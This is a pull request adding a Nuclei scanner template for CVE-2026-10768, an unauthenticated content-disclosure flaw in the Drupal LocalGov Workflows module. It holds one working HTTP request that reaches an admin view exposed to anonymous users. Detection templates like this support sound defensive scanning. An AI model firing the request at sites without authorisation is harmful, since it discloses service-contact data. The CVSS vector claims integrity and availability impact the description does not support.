### PR TITLE
Add CVE-2026-10768 Nuclei template

### DIFF
--- a/http/cves/2026/CVE-2026-10768.yaml
+++ b/http/cves/2026/CVE-2026-10768.yaml
@@ -1,0 +1,47 @@
+id: CVE-2026-10768
+
+info:
+  name: Drupal LocalGov Workflows < 1.6.0 - Unauthenticated Service Contact Content Disclosure
+  author: str4k3r
+  severity: critical
+  description: |
+    LocalGov Workflows versions before 1.6.0 expose the Content by owner
+    view to the access content permission, which is granted to anonymous users
+    on a standard Drupal site. An unauthenticated request to the view can
+    disclose service-contact names and the content assigned to them. Release
+    1.6.0 changes the view permission to administer localgov_service_contact.
+  reference:
+    - https://www.drupal.org/sa-contrib-2026-039
+    - https://www.drupal.org/project/localgov_workflows/releases/1.6.0
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-10768
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-10768
+    cwe-id: CWE-862
+  metadata:
+    verified: true
+    max-request: 1
+    product: drupal-localgov-workflows
+    vendor: drupal
+  tags: cve,cve2026,drupal,localgov,information-disclosure,unauth
+
+http:
+  - raw:
+      - |
+        GET /admin/content/localgov-service-contact/content-by-owner?service-contact-id={{service_contact_id}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - 'Content by owner'
+
+variables:
+  service_contact_id: ""


### PR DESCRIPTION
Adds a parameterized Nuclei template for CVE-2026-10768. Any required setup, seed, authentication, or callback values are exposed as scan-time variables; no forge-local target address is embedded. Native Nuclei validation passed, and the local ledger records the vulnerable/fixed differential as 3/3 detected versus 3/3 not detected.